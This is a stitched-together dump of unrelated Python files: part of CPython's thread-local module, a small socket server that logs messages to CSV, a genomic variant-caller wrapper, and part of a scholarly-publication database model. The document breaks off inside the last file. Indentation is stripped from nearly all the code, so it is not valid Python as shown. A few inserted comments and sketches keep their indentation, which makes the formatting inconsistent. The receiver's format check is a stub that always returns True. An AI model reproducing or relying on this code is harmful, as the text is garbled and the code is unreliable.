>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
from weakref import ref
from contextlib import contextmanager
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that all platforms on CPython do have support
# for locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest.
class _localimpl:
"""A class managing thread-local dicts"""
__slots__ = 'key', 'dicts', 'localargs', 'locallock', '__weakref__'
def __init__(self):
# The key used in the Thread objects' attribute dicts.
# We keep it a string for speed but make it unlikely to clash with
# a "real" attribute.
self.key = '_threading_local._localimpl.' + str(id(self))
# { id(Thread) -> (ref(Thread), thread-local dict) }
self.dicts = {}
def get_dict(self):
"""Return the dict for the current thread. Raises KeyError if none
defined."""
thread = current_thread()
return self.dicts[id(thread)][1]
def create_dict(self):
"""Create a new dict for the current thread, and return it."""
localdict = {}
key = self.key
thread = current_thread()
idt = id(thread)
def local_deleted(_, key=key):
# When the localimpl is deleted, remove the thread attribute.
thread = wrthread()
if thread is not None:
del thread.__dict__[key]
def thread_deleted(_, idt=idt):
# When the thread is deleted, remove the local dict.
# Note that this is suboptimal if the thread object gets
# caught in a reference loop. We would like to be called
# as soon as the OS-level thread ends instead.
local = wrlocal()
if local is not None:
dct = local.dicts.pop(idt)
wrlocal = ref(self, local_deleted)
wrthread = ref(thread, thread_deleted)
thread.__dict__[key] = wrlocal
self.dicts[idt] = wrthread, localdict
return localdict
@contextmanager
def _patch(self):
old = object.__getattribute__(self, '__dict__')
impl = object.__getattribute__(self, '_local__impl')
try:
dct = impl.get_dict()
except KeyError:
dct = impl.create_dict()
args, kw = impl.localargs
self.__init__(*args, **kw)
with impl.locallock:
object.__setattr__(self, '__dict__', dct)
yield
object.__setattr__(self, '__dict__', old)
class local:
__slots__ = '_local__impl', '__dict__'
def __new__(cls, *args, **kw):
if (args or kw) and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
self = object.__new__(cls)
impl = _localimpl()
impl.localargs = (args, kw)
impl.locallock = RLock()
object.__setattr__(self, '_local__impl', impl)
# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
impl.create_dict()
return self
def __getattribute__(self, name):
with _patch(self):
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__setattr__(self, name, value)
def __delattr__(self, name):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__delattr__(self, name)
from threading import current_thread, RLock
|
receiver.py
|
#! /usr/bin/env python
# coding:utf-8
import socket
import threading
import re
import csv
csv_file_name = "data"
def check_http(request):
if "HTML" in request:
return True
return False
# Check the format of a received message.
# If the format is valid, append the data to the CSV file and return True.
def check_format_and_save(msg):
# TODO: implement the format check here
# write to csv via append mode
with open(csv_file_name, "a") as f:
pass  # TODO: write the validated fields to the CSV file here
return True
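# A minimal illustrative implementation of the check above. The expected wire
# format is an assumption here (comma-separated numeric fields); this is a
# sketch, not the original author's logic, so adjust the regex and the CSV
# columns to the real protocol before relying on it.
def check_format_and_save_example(msg):
    fields = [field.strip() for field in msg.strip().split(",")]
    # every field must look like an integer or a decimal number (assumed format)
    if not fields or not all(re.fullmatch(r"-?\d+(\.\d+)?", f) for f in fields):
        return False
    # append one CSV row per valid message
    with open(csv_file_name, "a", newline="") as f:
        csv.writer(f).writerow(fields)
    return True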
bind_ip = 'xx.xx.xx.xx'
bind_port = 49498
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print("[*] listen {}:{}".format(bind_ip,str(bind_port)))
def handle_client(client_socket):
bufsize=1024
request = client_socket.recv(bufsize).decode("utf-8")
print("[*] recv:")
print(request)
if check_format_and_save(request):
print("[O] sending OK")
client_socket.send(b"OK\r\n")
else:
if check_http(request):
global csv_file_name
data_size = 0
#with open(csv_file_name, "r") as f:
# data_size = len(f.readlines())
message = b"HTTP/1.1 200 OK\r\n"
message += b"Connection: Keep-Alive\r\n"
message += b"Content-Type: text/html; charset=utf-8\r\n"
message += b"\r\n"
message += b"Hello.\r\n"
message += bytes("We have now {} lines of data...".format(hex(data_size)), "utf-8")
client_socket.send(message)
else:
print("[!] sending ERR")
client_socket.send(b"ERROR\r\n")
while True:
client,addr = server.accept()
print("[*] connected from: {}:{}".format(addr[0],str(addr[1])))
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()
|
variantcaller.py
|
#! /usr/bin/env python
# coding=utf-8
"""Module Description
Copyright (c) 2017 Jianfeng Li<lee_jianfeng@sjtu.edu.cn>
This code is free software; you can redistribute it and/or modify it
under the terms of the MIT License.
@variantcaller Variant Call Module
@status: experimental
@version: $Revision$
@author: Jianfeng Li
@contact: lee_jianfeng@sjtu.edu.cn
"""
from utils import *
from bam import *
from vcf import *
# ------------------------------------
# constants
# ------------------------------------
logging.basicConfig(level = 20,
format = '%(levelname)-5s @ %(asctime)s: %(message)s ',
datefmt = '%a, %d %b %Y %H:%M:%S',
stream = sys.stderr,
filemode = "w"
)
# ------------------------------------
# Misc functions
# ------------------------------------
error = logging.critical
warn = logging.warning
debug = logging.debug
info = logging.info
# ------------------------------------
# Debug file
# ------------------------------------
def prepare_optparser ():
"""Prepare optparser object. New options will be added in this
function first.
"""
usage = "usage: %prog -c mysample.cfg -s A01A -1 A01_1.fq -2 A02_2.fq"
description = "Please set the sample name. e.g. L04A, L04C, L04T."
optparser = OptionParser(version = "0.0.1", description = description, usage = usage, add_help_option = False)
optparser.add_option("-h", "--help", action = "help", help = "Show this help message and exit.")
optparser.add_option("-c", "--config", dest = "config", default = "config.cfg" ,type = "string",
help = "Set the config File.")
optparser.add_option("-s", "--samplename", dest = "samplename" ,type = "string",
help = "Set the samplename.")
optparser.add_option("-i", "--in_bam", dest = "in_bam" ,type = "string",
help = "If you have process the preprocess step, you can set this to your bam file path.(eg. case,control, or case only)")
optparser.add_option("-t", "--seq_type", dest = "seq_type" ,type = "string", default = "dna",
help = "Point the seq type[dna]")
optparser.add_option("-o", "--out_dir", dest = "out_dir" ,type = "string",
help = "Set the vcf file out_dir.(Required)")
return(optparser)
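# Example invocation (illustrative; file names and paths are placeholders):
#   python variantcaller.py -c mysample.cfg -s A01A -i A01A.bam -o /path/to/vcf_out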
def opt_validate (optparser):
"""Validate options from a OptParser object.
Ret: Validated options object.
"""
(options, args) = optparser.parse_args()
if not options.config:
optparser.print_help()
sys.exit(1)
elif not options.in_bam:
optparser.print_help()
sys.exit(1)
elif not options.out_dir:
optparser.print_help()
sys.exit(1)
return(options)
class FundementalCaller(object):
def __init__(self, caller_name):
self.mode = "germline"
self.avaliable_caller = ["lofreq","varscan","mutect","tvc","haplotypecaller","unifiedgenotyper","pindel"]
if caller_name.lower() in self.avaliable_caller:
self.caller_name = caller_name.lower()
else:
info("Now the avaliable variant_caller is only:" + self.avaliable_caller.join(",") + "! Please set correct caller in config file.")
def set_out_dir(self, out_dir):
self.out_dir = out_dir
create_dir(out_dir)
def set_caller_mode(self, mode):
if mode == "somatic":
self.mode = mode
elif mode == "germline":
self.mode = mode
else:
self.mode = False
def set_bamfile(self, samplename, case="", control="", runid = ""):
if case != "":
self.case = BamFile(case, samplename, self.cfg, runid)
if not self.case.isexist():
info(self.case.path + " is not exists! Please check the path!")
if control!="":
self.control = BamFile(control, samplename, self.cfg, runid)
if not self.control.isexist():
info(self.control.path + " is not exists! Please check the path!")
def set_config(self, cfg):  # if there were two class levels, this method could be merged into __init__
self.cfg = cfg
def set_seq_type(self, seq_type):
self.seq_type = seq_type
def call_variant(self):
if self.mode == "germline":
out_vcf=""
if self.caller_name == "tvc": # For Ion Torrent only
self.case.index()
out_vcf = self.case.torrent_caller(self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "haplotypecaller":
self.case.index()
out_vcf = self.case.haplotype_caller(self.out_dir, seq_type = self.seq_type)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "unifiedgenotyper":
self.case.index()
out_vcf = self.case.unifiedgenotyper_caller(self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "varscan":
self.case.index()
out_vcf = self.case.varscan_caller(self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "lofreq":
self.case.index()
out_vcf = self.case.lofreq_caller(self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "pindel":
self.case.index()
out_vcf = self.case.pindel_caller(self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if out_vcf:
return(out_vcf)
else:
msg = "Running %s in %s mode to %s fail! Can't generate the %s file." % (
self.caller_name, self.mode, self.case, out_vcf)
return(False)
elif self.mode == "somatic":
out_vcf=""
if self.caller_name == "mutect":
self.case.index()
self.control.index()
out_vcf = self.case.mutect_caller(self.control, self.out_dir)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "haplotypecaller":
self.case.index()
self.control.index()
out_vcf = self.case.haplotype_caller(
self.out_dir, self.control, seq_type = self.seq_type)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "unifiedgenotyper":
self.case.index()
self.control.index()
out_vcf = self.case.unifiedgenotyper_caller(
self.out_dir, self.control.path)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "varscan":
self.case.index()
self.control.index()
out_vcf = self.case.varscan_caller(
self.out_dir, self.control.path)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "lofreq":
self.case.index()
self.control.index()
out_vcf = self.case.lofreq_caller(
self.out_dir, self.control.path)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "tvc": # For Ion Torrent only
self.case.index()
self.control.index()
out_vcf = self.case.torrent_caller(
self.out_dir, self.control.path)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if self.caller_name == "pindel":
self.case.index()
out_vcf = self.case.pindel_caller(
self.out_dir, self.control.path)
out_vcf = VcfFile(out_vcf, self.case.samplename, self.cfg)
if out_vcf:
return(out_vcf)
else:
msg = "Running %s in %s mode to %s fail! Can't generate the %s file." % (
self.caller_name, self.mode, self.case, out_vcf)
def variant_caller(options):
cfg = get_config(options.config)
caller = cfg["caller"]
out_dir = options.out_dir
seq_type = options.seq_type
samplename = options.samplename
in_bam = options.in_bam
if not in_bam:
return(False)
caller_list = caller.split(",")
vcf_list = {}
threads = []
for caller in caller_list:
caller = caller.capitalize()
def func(caller = caller, cfg = cfg, seq_type = seq_type, out_dir = out_dir, samplename = samplename, in_bam = in_bam):
variantcaller = FundementalCaller(caller)
variantcaller.set_config(cfg)
variantcaller.set_seq_type(seq_type)
variantcaller.set_out_dir(out_dir + "/" + samplename + "/" + caller.capitalize())
variantcaller.set_bamfile(samplename, in_bam, runid = options.runid)
# VcfFile object dict, using all mapped bam file to generate vcf file
vcf_list[caller] = variantcaller.call_variant()
if caller != "Mutect":
threads.append(threading.Thread(target = func))
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
return(vcf_list)
def variant_caller_somatic(options):
cfg = get_config(options.config)
caller = cfg["caller"]
out_dir = options.out_dir
seq_type = options.seq_type
samplename = options.samplename
case_in_bam, control_in_bam = options.in_bam.split(",")
if not case_in_bam or not control_in_bam:
return(False)
caller_list = caller.split(",")
vcf_list = {}
threads = []
for caller in caller_list:
def func(caller = caller, cfg = cfg, seq_type = seq_type, out_dir = out_dir,
samplename = samplename, case_in_bam = case_in_bam, control_in_bam = control_in_bam):
variantcaller = FundementalCaller(caller)
variantcaller.set_caller_mode("somatic")
variantcaller.set_config(cfg)
variantcaller.set_seq_type(seq_type)
variantcaller.set_out_dir(out_dir + "/" + getid(samplename) + "/" + caller.capitalize())
variantcaller.set_bamfile(getid(samplename) + "T", case_in_bam,control_in_bam, options.runid)
# VcfFile object dict, using all mapped bam file to generate vcf file
vcf_list[caller] = variantcaller.call_variant()
threads.append(threading.Thread(target = func))
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
return(vcf_list)
def main():
options = opt_validate(prepare_optparser())
if len(options.in_bam.split(",")) ==1:
variant_caller(options)
elif len(options.in_bam.split(",")) ==2:
variant_caller_somatic(options)
if __name__ == "__main__":
try:
main()
info ("Successful run!!!")
except KeyboardInterrupt:
warn("User interrupts me! ;-) See you!")
sys.exit(0)
|
pub.py
|
import datetime
import json
import random
import re
from collections import Counter
from collections import OrderedDict
from collections import defaultdict
from enum import Enum
from threading import Thread
import boto3
import dateutil.parser
import gzip
import requests
import urllib.parse
from dateutil.relativedelta import relativedelta
from lxml import etree
from sqlalchemy import orm, sql
from sqlalchemy.dialects.postgresql import JSONB
from sqlalchemy.orm.attributes import flag_modified
import oa_evidence
import oa_local
import oa_manual
import oa_page
import page
from app import db
from app import logger
from http_cache import get_session_id
from journal import Journal
from open_location import OpenLocation, validate_pdf_urls, OAStatus, oa_status_sort_key
from pdf_url import PdfUrl
from pmh_record import is_known_mismatch
from pmh_record import title_is_too_common
from pmh_record import title_is_too_short
from recordthresher.record_maker import CrossrefRecordMaker
from reported_noncompliant_copies import reported_noncompliant_url_fragments
from util import NoDoiException
from util import is_pmc, clamp, clean_doi, fix_url_scheme, normalize_doi
from util import normalize
from util import normalize_title
from util import safe_commit
from webpage import PublisherWebpage
s2_endpoint_id = 'trmgzrn8eq4yx7ddvmzs'
def build_new_pub(doi, crossref_api):
my_pub = Pub(id=doi, crossref_api_raw_new=crossref_api)
my_pub.title = my_pub.crossref_title
my_pub.normalized_title = normalize_title(my_pub.title)
return my_pub
def add_new_pubs(pubs_to_commit):
if not pubs_to_commit:
return []
pubs_indexed_by_id = dict((my_pub.id, my_pub) for my_pub in pubs_to_commit)
ids_already_in_db = [
id_tuple[0] for id_tuple in db.session.query(Pub.id).filter(Pub.id.in_(list(pubs_indexed_by_id.keys()))).all()
]
pubs_to_add_to_db = []
for (pub_id, my_pub) in pubs_indexed_by_id.items():
if pub_id in ids_already_in_db:
# merge if we need to
pass
else:
pubs_to_add_to_db.append(my_pub)
# logger.info(u"adding new pub {}".format(my_pub.id))
if pubs_to_add_to_db:
logger.info("adding {} pubs".format(len(pubs_to_add_to_db)))
db.session.add_all(pubs_to_add_to_db)
safe_commit(db)
return pubs_to_add_to_db
def call_targets_in_parallel(targets):
if not targets:
return
# logger.info(u"calling", targets)
threads = []
for target in targets:
process = Thread(target=target, args=[])
process.start()
threads.append(process)
for process in threads:
try:
process.join(timeout=60*10)
except (KeyboardInterrupt, SystemExit):
pass
except Exception as e:
logger.exception("thread Exception {} in call_targets_in_parallel. continuing.".format(e))
# logger.info(u"finished the calls to {}".format(targets))
def call_args_in_parallel(target, args_list):
# logger.info(u"calling", targets)
threads = []
for args in args_list:
process = Thread(target=target, args=args)
process.start()
threads.append(process)
for process in threads:
try:
process.join(timeout=60*10)
except (KeyboardInterrupt, SystemExit):
pass
except Exception as e:
logger.exception("thread Exception {} in call_args_in_parallel. continuing.".format(e))
# logger.info(u"finished the calls to {}".format(targets))
def lookup_product_by_doi(doi):
biblio = {"doi": doi}
return lookup_product(**biblio)
def lookup_product(**biblio):
my_pub = None
if "doi" in biblio and biblio["doi"]:
doi = normalize_doi(biblio["doi"])
# map unregistered JSTOR DOIs to real articles
# for example https://www.jstor.org/stable/2244328?seq=1 says 10.2307/2244328 on the page
# but https://doi.org/10.2307/2244328 goes nowhere and the article is at https://doi.org/10.1214/aop/1176990626
jstor_overrides = {
'10.2307/2244328': '10.1214/aop/1176990626', # https://www.jstor.org/stable/2244328
'10.2307/25151720': '10.1287/moor.1060.0190', # https://www.jstor.org/stable/25151720
'10.2307/2237638': '10.1214/aoms/1177704711', # https://www.jstor.org/stable/2237638
}
other_overrides = {
# these seem to be the same thing but the first one doesn't work
# https://api.crossref.org/v1/works/http://dx.doi.org/10.3402/qhw.v1i3.4932
# https://api.crossref.org/v1/works/http://dx.doi.org/10.1080/17482620600881144
'10.3402/qhw.v1i3.4932': '10.1080/17482620600881144',
}
doi = jstor_overrides.get(
doi,
other_overrides.get(doi, doi)
)
my_pub = Pub.query.get(doi)
if not my_pub:
# try cleaning DOI further
doi = clean_doi(doi)
my_pub = Pub.query.get(doi)
if not my_pub:
raise NoDoiException
my_pub.reset_vars()
return my_pub
def refresh_pub(my_pub, do_commit=False):
my_pub.run_with_hybrid()
db.session.merge(my_pub)
if do_commit:
safe_commit(db)
return my_pub
def thread_result_wrapper(func, args, res):
res.append(func(*args))
# get rid of this when we get rid of POST endpoint
# for now, simplify it so it just calls the single endpoint
def get_pubs_from_biblio(biblios, run_with_hybrid=False):
returned_pubs = []
for biblio in biblios:
returned_pubs.append(get_pub_from_biblio(biblio, run_with_hybrid=run_with_hybrid))
return returned_pubs
def get_pub_from_biblio(biblio, run_with_hybrid=False, skip_all_hybrid=False):
my_pub = lookup_product(**biblio)
if run_with_hybrid:
my_pub.run_with_hybrid()
safe_commit(db)
else:
my_pub.recalculate()
return my_pub
def max_pages_from_one_repo(endpoint_ids):
endpoint_id_counter = Counter(endpoint_ids)
most_common = endpoint_id_counter.most_common(1)
if most_common:
return most_common[0][1]
return 0
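# e.g. max_pages_from_one_repo(['repo_a', 'repo_a', 'repo_b']) == 2
#      max_pages_from_one_repo([]) == 0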
def get_citeproc_date(year=0, month=1, day=1):
try:
return datetime.date(year, month, day)
except ValueError:
return None
def csv_dict_from_response_dict(data):
if not data:
return None
response = defaultdict(str)
response["doi"] = data.get("doi", None)
response["doi_url"] = data.get("doi_url", None)
response["is_oa"] = data.get("is_oa", None)
response["oa_status"] = data.get("oa_status", None)
response["genre"] = data.get("genre", None)
response["is_paratext"] = data.get("is_paratext", None)
response["journal_name"] = data.get("journal_name", None)
response["journal_issns"] = data.get("journal_issns", None)
response["journal_issn_l"] = data.get("journal_issn_l", None)
response["journal_is_oa"] = data.get("journal_is_oa", None)
response["journal_is_in_doaj"] = data.get("journal_is_in_doaj", None)
response["publisher"] = data.get("publisher", None)
response["published_date"] = data.get("published_date", None)
response["data_standard"] = data.get("data_standard", None)
best_location_data = data.get("best_oa_location", None)
if not best_location_data:
best_location_data = defaultdict(str)
response["best_oa_url"] = best_location_data.get("url", "")
response["best_oa_url_is_pdf"] = best_location_data.get("url_for_pdf", "") != ""
response["best_oa_evidence"] = best_location_data.get("evidence", None)
response["best_oa_host"] = best_location_data.get("host_type", None)
response["best_oa_version"] = best_location_data.get("version", None)
response["best_oa_license"] = best_location_data.get("license", None)
return response
def build_crossref_record(data):
if not data:
return None
record = {}
simple_fields = [
"publisher",
"subject",
"link",
"license",
"funder",
"type",
"update-to",
"clinical-trial-number",
"ISSN", # needs to be uppercase
"ISBN", # needs to be uppercase
"alternative-id"
]
for field in simple_fields:
if field in data:
record[field.lower()] = data[field]
if "title" in data:
if isinstance(data["title"], str):
record["title"] = data["title"]
else:
if data["title"]:
record["title"] = data["title"][0] # first one
if "title" in record and record["title"]:
record["title"] = re.sub("\s+", " ", record["title"])
if "container-title" in data:
record["all_journals"] = data["container-title"]
if isinstance(data["container-title"], str):
record["journal"] = data["container-title"]
else:
if data["container-title"]:
record["journal"] = data["container-title"][-1] # last one
# get rid of leading and trailing newlines
if record.get("journal", None):
record["journal"] = record["journal"].strip()
if "author" in data:
# record["authors_json"] = json.dumps(data["author"])
record["all_authors"] = data["author"]
if data["author"]:
first_author = data["author"][0]
if first_author and "family" in first_author:
record["first_author_lastname"] = first_author["family"]
for author in record["all_authors"]:
if author and "affiliation" in author and not author.get("affiliation", None):
del author["affiliation"]
if "issued" in data:
# record["issued_raw"] = data["issued"]
try:
if "raw" in data["issued"]:
record["year"] = int(data["issued"]["raw"])
elif "date-parts" in data["issued"]:
record["year"] = int(data["issued"]["date-parts"][0][0])
date_parts = data["issued"]["date-parts"][0]
pubdate = get_citeproc_date(*date_parts)
if pubdate:
record["pubdate"] = pubdate.isoformat()
except (IndexError, TypeError):
pass
if "deposited" in data:
try:
record["deposited"] = data["deposited"]["date-time"]
except (IndexError, TypeError):
pass
record["added_timestamp"] = datetime.datetime.utcnow().isoformat()
return record
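# Illustrative example (the sample metadata below is made up, not real Crossref data):
#   build_crossref_record({
#       "title": ["A Sample Paper"],
#       "container-title": ["A Sample Journal"],
#       "issued": {"date-parts": [[2019, 3, 1]]},
#   })
# yields record["title"] == "A Sample Paper", record["journal"] == "A Sample Journal",
# record["year"] == 2019 and record["pubdate"] == "2019-03-01",
# plus an "added_timestamp" set to the current UTC time.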
class PmcidPublishedVersionLookup(db.Model):
pmcid = db.Column(db.Text, db.ForeignKey('pmcid_lookup.pmcid'), primary_key=True)
class PmcidLookup(db.Model):
doi = db.Column(db.Text, db.ForeignKey('pub.id'), primary_key=True)
pmcid = db.Column(db.Text)
release_date = db.Column(db.Text)
pmcid_pubished_version_link = db.relationship(
'PmcidPublishedVersionLookup',
lazy='subquery',
viewonly=True,
backref=db.backref("pmcid_lookup", lazy="subquery"),
foreign_keys="PmcidPublishedVersionLookup.pmcid"
)
@property
def version(self):
if self.pmcid_pubished_version_link:
return "publishedVersion"
return "acceptedVersion"
class IssnlLookup(db.Model):
__tablename__ = 'journalsdb_issn_to_issn_l'
issn = db.Column(db.Text, primary_key=True)
issn_l = db.Column(db.Text)
journalsdb_id = db.Column(db.Text)
class JournalOaStartYear(db.Model):
__tablename__ = 'journal_oa_start_year_patched'
issn_l = db.Column(db.Text, primary_key=True)
title = db.Column(db.Text)
oa_year = db.Column(db.Integer)
class S2Lookup(db.Model):
__tablename__ = 'semantic_scholar'
doi = db.Column(db.Text, primary_key=True)
s2_url = db.Column(db.Text)
s2_pdf_url = db.Column(db.Text)
class GreenScrapeAction(Enum):
scrape_now = 1
queue = 2
none = 3
class Preprint(db.Model):
preprint_id = db.Column(db.Text, primary_key=True)
postprint_id = db.Column(db.Text, primary_key=True)
def __repr__(self):
return '<Preprint {}, {}>'.format(self.preprint_id, self.postprint_id)
class Retraction(db.Model):
retraction_doi = db.Column(db.Text, primary_key=True)
retracted_doi = db.Column(db.Text, primary_key=True)
def __repr__(self):
return '<Retraction {}, {}>'.format(self.retraction_doi, self.retracted_doi)
class FilteredPreprint(db.Model):
preprint_id = db.Column(db.Text, primary_key=True)
postprint_id = db.Column(db.Text, primary_key=True)
def __repr__(self):
return '<FilteredPreprint {}, {}>'.format(self.preprint_id, self.postprint_id)
class PubRefreshResult(db.Model):
id = db.Column(db.Text, primary_key=True)
refresh_time = db.Column(db.DateTime, primary_key=True)
oa_status_before = db.Column(db.Text)
oa_status_after = db.Column(db.Text)
def __repr__(self):
return f'<PubRefreshResult({self.id}, {self.refresh_time}, {self.oa_status_before}, {self.oa_status_after})>'
LANDING_PAGE_ARCHIVE_BUCKET = 'unpaywall-doi-landing-page'
class Pub(db.Model):
id = db.Column(db.Text, primary_key=True)
updated = db.Column(db.DateTime)
crossref_api_raw_new = db.Column(JSONB)
published_date = db.Column(db.DateTime)
title = db.Column(db.Text)
normalized_title = db.Column(db.Text)
issns_jsonb = db.Column(JSONB)
last_changed_date = db.Column(db.DateTime)
response_jsonb = db.Column(JSONB)
response_is_oa = db.Column(db.Boolean)
response_best_evidence = db.Column(db.Text)
response_best_url = db.Column(db.Text)
response_best_host = db.Column(db.Text)
response_best_repo_id = db.Column(db.Text)
response_best_version = db.Column(db.Text)
scrape_updated = db.Column(db.DateTime)
scrape_evidence = db.Column(db.Text)
scrape_pdf_url = db.Column(db.Text)
scrape_metadata_url = db.Column(db.Text)
scrape_license = db.Column(db.Text)
resolved_doi_url = db.Column(db.Text)
resolved_doi_http_status = db.Column(db.SmallInteger)
doi_landing_page_is_archived = db.Column(db.Boolean)
recordthresher_id = db.Column(db.Text)
error = db.Column(db.Text)
rand = db.Column(db.Numeric)
pmcid_links = db.relationship(
'PmcidLookup',
lazy='subquery',
viewonly=True,
backref=db.backref("pub", lazy="subquery"),
foreign_keys="PmcidLookup.doi"
)
page_matches_by_doi = db.relationship(
'Page',
lazy='subquery',
viewonly=True,
backref=db.backref("pub_by_doi", lazy="subquery"),
foreign_keys="Page.doi"
)
repo_page_matches_by_doi = db.relationship(
'RepoPage',
lazy='subquery',
viewonly=True,
primaryjoin="and_(RepoPage.match_doi == True, RepoPage.doi == Pub.id)"
)
repo_page_matches_by_title = db.relationship(
'RepoPage',
lazy='subquery',
viewonly=True,
primaryjoin="and_(RepoPage.match_title == True, RepoPage.normalized_title == Pub.normalized_title)"
)
def __init__(self, **biblio):
self.reset_vars()
self.rand = random.random()
self.license = None
self.free_metadata_url = None
self.free_pdf_url = None
self.oa_status = None
self.evidence = None
self.open_locations = []
self.embargoed_locations = []
self.closed_urls = []
self.session_id = None
self.version = None
self.issn_l = None
self.journalsdb_journal_id = None
# self.updated = datetime.datetime.utcnow()
for (k, v) in biblio.items():
self.__setattr__(k, v)
@orm.reconstructor
def init_on_load(self):
self.reset_vars()
def reset_vars(self):
if self.id and self.id.startswith("10."):
self.id = normalize_doi(self.id)
self.license = None
self.free_metadata_url = None
self.free_pdf_url = None
self.oa_status = None
self.evidence = None
self.open_locations = []
self.embargoed_locations = []
self.closed_urls = []
self.session_id = None
self.version = None
issn_l_lookup = self.lookup_issn_l()
self.issn_l = issn_l_lookup.issn_l if issn_l_lookup else None
self.journalsdb_journal_id = issn_l_lookup.journalsdb_id if issn_l_lookup else None
@property
def doi(self):
return self.id
@property
def unpaywall_api_url(self):
return "https://api.unpaywall.org/v2/{}?email=internal@impactstory.org".format(self.id)
@property
def tdm_api(self):
return None
@property
def crossref_api_raw(self):
record = None
try:
if self.crossref_api_raw_new:
return self.crossref_api_raw_new
except IndexError:
pass
return record
@property
def crossref_api_modified(self):
record = None
if self.crossref_api_raw_new:
try:
return build_crossref_record(self.crossref_api_raw_new)
except IndexError:
pass
if self.crossref_api_raw:
try:
record = build_crossref_record(self.crossref_api_raw)
print("got record")
return record
except IndexError:
pass
return record
@property
def open_urls(self):
# return sorted urls, without dups
urls = []
for location in self.sorted_locations:
if location.best_url not in urls:
urls.append(location.best_url)
return urls
@property
def url(self):
if self.doi and self.doi.startswith('10.2218/forum.'):
article_id = self.doi.split('.')[-1]
return f'http://journals.ed.ac.uk/forum/article/view/{article_id}'
return "https://doi.org/{}".format(self.id)
@property
def is_oa(self):
return bool(self.fulltext_url)
@property
def is_paratext(self):
paratext_exprs = [
r'^Author Index$',
r'^Back Cover',
r'^Contents$',
r'^Contents:',
r'^Cover Image',
r'^Cover Picture',
r'^Editorial Board',
r'^Front Cover',
r'^Frontispiece',
r'^Inside Back Cover',
r'^Inside Cover',
r'^Inside Front Cover',
r'^Issue Information',
r'^List of contents',
r'^Masthead',
r'^Title page',
]
for expr in paratext_exprs:
if self.title and re.search(expr, self.title, re.IGNORECASE):
return True
return False
@property
def is_retracted(self):
return bool(
Retraction.query.filter(Retraction.retracted_doi == self.doi).all()
)
def recalculate(self, quiet=False, ask_preprint=True):
self.clear_locations()
if self.publisher == "CrossRef Test Account":
self.error += "CrossRef Test Account"
raise NoDoiException
if self.journal == "CrossRef Listing of Deleted DOIs":
self.error += "CrossRef Deleted DOI"
raise NoDoiException
self.find_open_locations(ask_preprint)
self.decide_if_open()
self.set_license_hacks()
if self.is_oa and not quiet:
logger.info("**REFRESH found a fulltext_url for {}! {}: {} **".format(
self.id, self.oa_status.value, self.fulltext_url))
def refresh_crossref(self):
from put_crossref_in_db import get_api_for_one_doi
self.crossref_api_raw_new = get_api_for_one_doi(self.doi)
def refresh_including_crossref(self):
self.refresh_crossref()
return self.refresh()
def refresh(self, session_id=None):
self.session_id = session_id or get_session_id()
refresh_result = PubRefreshResult(
id=self.id,
refresh_time=datetime.datetime.utcnow(),
oa_status_before=self.response_jsonb and self.response_jsonb.get('oa_status', None)
)
# self.refresh_green_locations()
self.refresh_hybrid_scrape()
# and then recalculate everything, so can do to_dict() after this and it all works
self.update(force_update_rt=True)
refresh_result.oa_status_after = self.response_jsonb and self.response_jsonb.get('oa_status', None)
db.session.merge(refresh_result)
# then do this so the recalculated stuff saves
# it's ok if this takes a long time... it's short compared to refresh_hybrid_scrape
db.session.merge(self)
def create_or_update_recordthresher_record(self):
if rt_record := CrossrefRecordMaker.make_record(self):
db.session.merge(rt_record)
self.recordthresher_id = rt_record.id
def set_results(self):
self.issns_jsonb = self.issns
self.response_jsonb = self.to_dict_v2()
self.response_is_oa = self.is_oa
self.response_best_url = self.best_url
self.response_best_evidence = self.best_evidence
self.response_best_version = self.best_version
self.response_best_host = self.best_host
self.response_best_repo_id = self.best_repo_id
def clear_results(self):
self.response_jsonb = None
self.response_is_oa = None
self.response_best_url = None
self.response_best_evidence = None
self.response_best_version = None
self.response_best_host = None
self.response_best_repo_id = None
self.error = ""
self.issns_jsonb = None
@staticmethod
def ignored_keys_for_internal_diff():
